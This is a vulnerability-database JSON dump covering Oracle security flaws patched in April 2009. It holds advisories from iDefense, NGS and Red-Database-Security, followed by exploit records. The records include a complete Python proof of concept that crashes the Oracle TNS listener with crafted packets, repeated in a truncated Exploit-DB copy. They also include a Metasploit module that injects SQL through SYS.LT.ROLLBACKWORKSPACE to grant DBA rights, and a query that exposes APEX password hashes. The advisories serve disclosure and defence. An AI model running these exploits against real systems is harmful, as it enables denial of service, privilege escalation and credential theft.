published\r\n\r\n\r\nAbout Red-Database-Security:\r\nRed-Database-Security is the leading company for Oracle security. Within the last \r\n6 years we reported several hundred vulnerabilities to Oracle.\r\n\r\n\r\n--\r\n(c) 2009 by Red-Database-Security GmbH\r\nhttp://www.red-database-security.com", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "id": "SECURITYVULNS:DOC:21664", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21664", "title": "SQL Injection in package DBMS_AQADM_SYS", "type": "securityvulns", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "Many security standards require the tracking of users' password history to \r\nprevent password re-use. In Oracle 11g (11.1.0.6), if a security \r\nadministrator has enabled 11g passwords exclusively then tracking password \r\nhistory is broken. This can affect compliance. This was addressed by Oracle \r\nin their April 2009 Critical Patch Update and maps to the currently \r\nunspecified vulnerability at \r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0988\r\nCheers,\r\nDavid Litchfield\r\nNGSSoftware Ltd\r\nhttp://www.ngssoftware.com/\r\n\r\n--\r\nE-MAIL DISCLAIMER\r\n\r\nThe information contained in this email and any subsequent\r\ncorrespondence is private, is solely for the intended recipient(s) and\r\nmay contain confidential or privileged information. For those other than\r\nthe intended recipient(s), any disclosure, copying, distribution, or any\r\nother action taken, or omitted to be taken, in reliance on such\r\ninformation is prohibited and may be unlawful. If you are not the\r\nintended recipient and have received this message in error, please\r\ninform the sender and delete this mail and any attachments.\r\n\r\nThe views expressed in this email do not necessarily reflect NGS policy.\r\nNGS accepts no liability or responsibility for any onward transmission\r\nor use of emails and attachments having left the NGS domain.\r\n\r\nNGS and NGSSoftware are trading names of Next Generation Security\r\nSoftware Ltd. Registered office address: Manchester Technology Centre,\r\nOxford Road, Manchester, M1 7EF with Company Number 04225835 and\r\nVAT Number 783096402", "modified": "2009-08-26T00:00:00", "published": "2009-08-26T00:00:00", "id": "SECURITYVULNS:DOC:22384", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22384", "title": "Oracle 11g (11.1.0.6) Password Policy and Compliance", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "Name Unprivileged DB users can see APEX password hashes\r\nSystems Affected APEX 3.0 (optional component of 11.1.0.7 installation)\r\nSeverity High Risk\r\nCategory Password Disclosure\r\nVendor URL http://www.oracle.com/\r\nAuthor Alexander Kornbrust (ak at red-database-security.com)\r\nCVE CVE-2009-0981\r\nAdvisory 14 April 2009 (V 1.00)\r\n\r\n\r\nDetails:\r\nUnprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.\r\n\r\nSQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS\r\n\r\nUSER_NAME WEB_PASSWORD2\r\n----------------------------------------------------------------------\r\nYURI 141FA790354FB6C72802FDEA86353F31\r\n\r\nThis password hash can be checked using a tool like Repscan.\r\n\r\n\r\nAdditional information is available in the following advisory.\r\n\r\n\r\nAdvisory:\r\nhttp://www.red-database-security.com/advisory/apex_password_hashes.html\r\n\r\n\r\nPatch Information:\r\nUpgrade to Oracle APEX 3.2.\r\n\r\n\r\nVerification:\r\nOur Oracle database scanner Repscan was updated with the information from the Oracle\r\nCPU April 2009 and can identify vulnerable databases. \r\nMore Information about Repscan can be found here:\r\nhttp://www.sentrigo.com/repscan\r\n\r\n\r\nHistory:\r\n13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]\r\n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]\r\n14-apr-2009 Advisory published\r\n\r\n\r\nAbout Red-Database-Security:\r\nRed-Database-Security is the leading company for Oracle security. Within the last \r\n6 years we reported several hundred vulnerabilities to Oracle.\r\n\r\n--\r\n(c) 2009 by Red-Database-Security GmbH\r\nhttp://www.red-database-security.com", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "id": "SECURITYVULNS:DOC:21665", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21665", "title": "Unprivileged DB users can see APEX password hashes", "type": "securityvulns", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDefense Security Advisory 05.14.09\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nMay 14, 2009\r\n\r\nI. BACKGROUND\r\n\r\nOracle Corp.'s Outside In Technology is a document conversion engine\r\nsupporting a large number of binary file formats. Prior to Oracle's\r\nacquisition, the software was maintained by Stellent Inc. The software\r\nappears to have originated from "QuickView" for Windows 98, but later\r\nspun off. It is used by various software packages, one of which is\r\nMotorola Inc.'s Good Mobile Messaging Server. For more information,\r\nvisit the vendors' sites at the URLs provided below.\r\n\r\nhttp://www.oracle.com/technology/products/content-management/oit/oit_all.html\r\n\r\nhttp://www.good.com/corp/index.php\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of an integer overflow vulnerability in Oracle\r\nCorp.'s Outside In Technology, as included in various vendors' software\r\ndistributions, allows attacker to execute arbitrary code.\r\n\r\nThis vulnerability exists when handling specific records within a\r\nspecially crafted Microsoft Excel spreadsheet file. Within the\r\nvulnerable function, an integer value is read from the file. This value\r\nis later used in an arithmetic integer calculation. Since no validation\r\nis performed, an integer overflow can occur. This results in the\r\nallocation of a buffer that is too small to hold the data that is\r\nsubsequently read from the file. A heap buffer overflow occurs, leading\r\nto an exploitable condition.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability allows attackers to execute arbitrary\r\ncode. In order to exploit this vulnerability, the attacker must somehow\r\nsupply a malformed document to an application that will process the\r\ndocument with Outside In Technology. Likewise, the privileges gained\r\nwill also depend on the software using the library.\r\n\r\nIn the case of Good Mobile Messaging Server, an attacker can send an\r\nelectronic mail message with an Excel spreadsheet attachment to a user.\r\nWhen the user chooses to view the spreadsheet, the vulnerable condition\r\nwill be triggered. Upon successful exploitation, the attacker will gain\r\nthe privileges of the "GoodAdmin" user. This is a special user account\r\nwhich, in some configurations, may be a member of the "Administrator"\r\ngroup. Regardless of the user's "Administrator" status, the user will\r\nalways have full privileges to "Read" and "Send As" all users on the\r\nMicrosoft Exchange server. This could allow an attacker to conduct\r\nfurther social engineering attacks.\r\n\r\nOther software packages using Outside In were not investigated.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of this vulnerability using the follow\r\nversions of Outside In on Windows Server 2003.\r\n\r\n 8.1.5.4282\r\n 8.1.9.4417\r\n 8.2.2.4866\r\n 8.3.0.5129\r\n\r\nAdditionally the following versions of Good Mobile Messaging Server for\r\nExchange ship with vulnerable versions of vsxl5.dll.\r\n\r\n 4.9.3.41\r\n 5.0.4.28\r\n 6.0.0.106\r\n\r\nAll versions of Outside In, including versions for operating systems\r\nother than Windows, are assumed to be vulnerable. Additionally, all\r\nsoftware that includes or uses Outside In is assumed to be vulnerable.\r\nEarlier versions, including those branded with other names, are\r\nvulnerable as well.\r\n\r\nV. WORKAROUND\r\n\r\nIn order to prevent exploitation of this vulnerability, iDefense\r\nrecommends using file system access control lists (ACLs) to prevent\r\nreading the affected module.\r\n\r\nFor Good Mobile Messaging Server, Good Software recommends deleting the\r\nGdFileConv.exe file and restarting the Messaging Server.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle has released a patch which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nGood Technology has released a patch which addresses this issue. For\r\nmore information, consult their advisory at the following URL:\r\n\r\nhttp://www.good.com/faq/18431.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2009-1010 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n01/30/2009 - GoodLink contact identified\r\n01/30/2009 - Security contact research begins\r\n02/05/2009 - Oracle contact identified\r\n02/09/2009 - Initial Oracle Reply\r\n02/09/2009 - Initial Vendor Notification\r\n02/10/2009 - Initial GoodLink Reply\r\n02/11/2009 - Oracle validation\r\n02/16/2009 - GoodLink customer alert sent\r\n02/16/2009 - GoodLink validation\r\n02/19/2009 - Oracle requests PoC\r\n02/19/2009 - PoC sent to Oracle\r\n02/25/2009 - GoodLink status update\r\n02/27/2009 - Oracle status update\r\n03/06/2009 - GoodLink status update\r\n04/14/2009 - Oracle patch released\r\n05/13/2009 - CVE Corelation requested from Oracle\r\n05/14/2009 - Coordinated Public Disclosure\r\n05/14/2009 - GoodLink ready for disclosure coordinated with iDefense\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was discovered by Joshua J. Drake, iDefense Labs.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2009 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKDct2bjs6HoxIfBkRAqJpAKCIaUYcf3oC6AYdo3WwENP3QwNSlACfSdRk\r\nV0LVJGcrfJnJc1LF37H8YaA=\r\n=fFYX\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2009-05-18T00:00:00", "published": "2009-05-18T00:00:00", "id": "SECURITYVULNS:DOC:21835", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21835", "title": "iDefense Security Advisory 05.14.09: Multiple Vendor Outside In Spreadsheet Integer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "Many security standards require the tracking of users' password history to \r\nprevent password re-use. In Oracle 11g (11.1.0.6), if a security \r\nadministrator has enabled 11g passwords exclusively then tracking password \r\nhistory is broken. This can affect compliance. This was addressed by Oracle \r\nin their April 2009 Critical Patch Update and maps to the currently \r\nunspecified vulnerability at \r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0988\r\nCheers,\r\nDavid Litchfield\r\nNGSSoftware Ltd\r\nhttp://www.ngssoftware.com/\r\n\r\n--\r\nE-MAIL DISCLAIMER\r\n\r\nThe information contained in this email and any subsequent\r\ncorrespondence is private, is solely for the intended recipient(s) and\r\nmay contain confidential or privileged information. For those other than\r\nthe intended recipient(s), any disclosure, copying, distribution, or any\r\nother action taken, or omitted to be taken, in reliance on such\r\ninformation is prohibited and may be unlawful. If you are not the\r\nintended recipient and have received this message in error, please\r\ninform the sender and delete this mail and any attachments.\r\n\r\nThe views expressed in this email do not necessarily reflect NGS policy.\r\nNGS accepts no liability or responsibility for any onward transmission\r\nor use of emails and attachments having left the NGS domain.\r\n\r\nNGS and NGSSoftware are trading names of Next Generation Security\r\nSoftware Ltd. Registered office address: Manchester Technology Centre,\r\nOxford Road, Manchester, M1 7EF with Company Number 04225835 and\r\nVAT Number 783096402 \r\n", "modified": "2009-08-26T00:00:00", "published": "2009-08-26T00:00:00", "id": "SECURITYVULNS:DOC:22380", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22380", "title": "Oracle 11g (11.1.0.6) Password Policy and Compliance", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:52", "bulletinFamily": "exploit", "description": "", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "href": "https://packetstormsecurity.com/files/76855/Oracle-RDBMS-TNS-Listener-Proof-Of-Concept.html", "id": "PACKETSTORM:76855", "type": "packetstorm", "title": "Oracle RDBMS TNS Listener Proof Of Concept", "sourceData": "`# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process \n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll) \n \n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied \n \n# Vulnerability discovered by Dennis Yurichev <dennis@conus.info> \n \n# Fixed in CPUapr2009, CVE-2009-0991 \n# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html \n \nfrom sys import * \nfrom socket import * \n \nsockobj = socket(AF_INET, SOCK_STREAM) \n \nsockobj.connect ((argv[1], 1521)) \n \nsockobj.send( \n\"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00\" \n\"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45\" \n\"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44\" \n\"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65\" \n\"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29\") \n \ndata=sockobj.recv(102400) \n \nsockobj.send( \n\"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08\" \n\"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32\" \n\"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00\" \n\"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00\" \n\"\\x23\\x00\\x00\\x00\\x42\\x45\\x43\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36\" \n\"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42\" \n\"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\" \n\"\\x00\\x00\\x84\\xc3\\xcc\\x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00\" \n\"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac\" \n\"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00\" \n\"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3\" \n\"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e\" \n\"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00\" \n\"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00\" \n\"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09\" \n\"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\" \n\"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\" \n\"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\" \n\"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\" \n\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00\" \n\"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f\" \n\"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x89\\xc0\\xb1\\xc3\\x08\\x1d\" \n\"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b\" \n\"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c\" \n\"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00\" \n\"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\" \n\"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\x49\\x43\\x41\\x54\\x45\\x44\\x00\" \n\"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43\" \n\"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d\" \n\"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72\" \n\"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e\" \n\"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61\" \n\"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f\" \n\"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d\" \n\"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c\" \n\"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x68\\xc5\\x2f\\x22\" \n\"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22\" \n\"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f\" \n\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\" \n) \n \nsockobj.close() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/76855/oraclerdbms-poc.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:25:24", "bulletinFamily": "exploit", "description": "", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "href": "https://packetstormsecurity.com/files/76731/APEX-Password-Hash-Disclosure.html", "id": "PACKETSTORM:76731", "type": "packetstorm", "title": "APEX Password Hash Disclosure", "sourceData": "`Name Unprivileged DB users can see APEX password hashes \nSystems Affected APEX 3.0 (optional component of 11.1.0.7 installation) \nSeverity High Risk \nCategory Password Disclosure \nVendor URL http://www.oracle.com/ \nAuthor Alexander Kornbrust (ak at red-database-security.com) \nCVE CVE-2009-0981 \nAdvisory 14 April 2009 (V 1.00) \n \n \nDetails: \nUnprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER. \n \nSQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS \n \nUSER_NAME WEB_PASSWORD2 \n---------------------------------------------------------------------- \nYURI 141FA790354FB6C72802FDEA86353F31 \n \nThis password hash can be checked using a tool like Repscan. \n \n \nAdditional information is available in the following advisory. \n \n \nAdvisory: \nhttp://www.red-database-security.com/advisory/apex_password_hashes.html \n \n \nPatch Information: \nUpgrade to Oracle APEX 3.2. \n \n \nVerification: \nOur Oracle database scanner Repscan was updated with the information from the Oracle \nCPU April 2009 and can identify vulnerable databases. \nMore Information about Repscan can be found here: \nhttp://www.sentrigo.com/repscan \n \n \nHistory: \n13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] \n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] \n14-apr-2009 Advisory published \n \n \nAbout Red-Database-Security: \nRed-Database-Security is the leading company for Oracle security. Within the last \n6 years we reported several hundred vulnerabilities to Oracle. \n \n-- \n(c) 2009 by Red-Database-Security GmbH \nhttp://www.red-database-security.com \n`\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/76731/apex-disclose.txt"}], "metasploit": [{"lastseen": "2018-08-07T13:13:42", "bulletinFamily": "exploit", "description": "This module exploits a sql injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.", "modified": "2017-08-29T00:17:58", "published": "2009-07-28T13:43:37", "id": "MSF:AUXILIARY/SQLI/ORACLE/LT_ROLLBACKWORKSPACE", "href": "", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE',\n 'Description' => %q{\n This module exploits a sql injection flaw in the ROLLBACKWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-0978' ],\n [ 'OSVDB', '53734'],\n [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html' ],\n ],\n 'DisclosureDate' => 'May 4 2009'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execte.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n cruft = Rex::Text.rand_text_alpha_upper(rand(5) + 1)\n\n function = \"\n CREATE OR REPLACE FUNCTION #{cruft}\n RETURN VARCHAR2 AUTHID CURRENT_USER\n AS\n PRAGMA AUTONOMOUS_TRANSACTION;\n BEGIN\n EXECUTE IMMEDIATE '#{datastore['SQL']}';\n COMMIT;\n RETURN '#{cruft}';\n END;\"\n\n package1 = %Q|\n BEGIN\n SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');\n END;\n |\n\n package2 = %Q|\n BEGIN\n SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');\n END;\n |\n\n uno = Rex::Text.encode_base64(function)\n dos = Rex::Text.encode_base64(package1)\n tres = Rex::Text.encode_base64(package2)\n\n sql = %Q|\n DECLARE\n #{rand1} VARCHAR2(32767);\n #{rand2} VARCHAR2(32767);\n #{rand3} VARCHAR2(32767);\n BEGIN\n #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));\n EXECUTE IMMEDIATE #{rand1};\n #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));\n EXECUTE IMMEDIATE #{rand2};\n #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));\n EXECUTE IMMEDIATE #{rand3};\n END;\n |\n\n clean = \"DROP FUNCTION #{cruft}\"\n\n print_status(\"Attempting sql injection on SYS.LT.ROLLBACKWORKSPACE...\")\n prepare_exec(sql)\n print_status(\"Removing function '#{cruft}'...\")\n prepare_exec(clean)\n end\nend\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb"}], "exploitdb": [{"lastseen": "2016-02-01T07:31:46", "bulletinFamily": "exploit", "description": "Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991). CVE-2009-0991. Dos exploit for windows platform", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "id": "EDB-ID:8507", "href": "https://www.exploit-db.com/exploits/8507/", "type": "exploitdb", "title": "Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener PoC", "sourceData": "# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process \r\n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)\r\n\r\n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied\r\n\r\n# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>\r\n\r\n# Fixed in CPUapr2009, CVE-2009-0991\r\n# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nfrom sys import *\r\nfrom socket import *\r\n\r\nsockobj = socket(AF_INET, SOCK_STREAM)\r\n\r\nsockobj.connect ((argv[1], 